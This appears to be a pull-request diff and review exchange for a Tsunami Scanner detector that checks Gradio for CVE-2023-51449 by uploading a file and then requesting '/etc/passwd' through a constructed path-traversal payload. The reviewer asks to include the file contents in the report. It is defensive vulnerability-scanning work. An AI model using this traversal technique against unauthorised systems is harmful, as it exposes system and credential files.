community/detectors/gradio_cve_2023_51449/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202351449/Cve202351449VulnDetector.java

```diff
@@ -0,0 +1,225 @@
+    fileRequest.writeTo(fileBuffer);
+
+    return httpClient.send(
+        post(uploadUrl)
+            .setHeaders(
+                HttpHeaders.builder()
+                    .addHeader(CONTENT_TYPE, fileRequest.contentType().toString())
+                    .addHeader(USER_AGENT, "Tsunami Scanner")
+                    .build())
+            .setRequestBody(ByteString.copyFrom(fileBuffer.readByteArray()))
+            .build(),
+        networkService);
+  }
+
+  private String producePathTravesalPayload(String tmpFile) {
+    Path tmpFilePath = Path.of(tmpFile);
+    Path parentDir = tmpFilePath.getParent();
+    int subdirCount = parentDir.getNameCount();
+    StringBuilder payloadBuilder = new StringBuilder();
+    payloadBuilder.append(parentDir.toString());
+    for (int i = 0; i < subdirCount; i++) {
+      payloadBuilder.append("/..");
+    }
+    payloadBuilder.append("/etc/passwd");
+
+    return payloadBuilder.toString();
+  }
+
+  private HttpResponse sendGetFileRequest(NetworkService networkService, String payload)
+      throws IOException {
+    String fetchFileUrl = buildTarget(networkService).append(GET_FILE_PATH).toString() + payload;
+    return httpClient.sendAsIs(
+        HttpRequest.get(fetchFileUrl)
+            .setHeaders(HttpHeaders.builder().addHeader(USER_AGENT, "Tsunami Scanner").build())
+            .build());
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    try {
+      logger.atInfo().log("Attempting to upload a temporary file");
+      HttpResponse uploadResponse = sendUploadRequest(networkService);
+      if (uploadResponse.status().code() != HttpStatus.OK.code()) {
+        return false;
+      }
+
+      JsonElement json = uploadResponse.bodyJson().get();
+      String tmpFile = json.getAsJsonArray().get(0).getAsString();
+      String ptPayload = producePathTravesalPayload(tmpFile);
+
+      logger.atInfo().log("Attempting to fetch arbitrary file");
+      HttpResponse getFileResponse = sendGetFileRequest(networkService, ptPayload);
+      String body = getFileResponse.bodyString().get();
+      if (getFileResponse.status().code() == HttpStatus.OK.code()
+          && body.contains(DETECTION_STRING)) {
+        return true;
+      }
+
+      return false;
+    } catch (IOException e) {
+      return false;
+    } catch (Exception e) {
+      logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
+      return false;
+    }
+  }
+
+  private DetectionReport buildDetectionReport(
+      TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+    return DetectionReport.newBuilder()
+        .setTargetInfo(targetInfo)
+        .setNetworkService(vulnerableNetworkService)
+        .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+        .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+        .setVulnerability(
+            Vulnerability.newBuilder()
```

Comment:
Could you please add the contents of /etc/passwd to the extra details of the vuln:
`addAdditionalDetails()`

Reply:
Sure @vsutedjo ! Done :heavy_check_mark: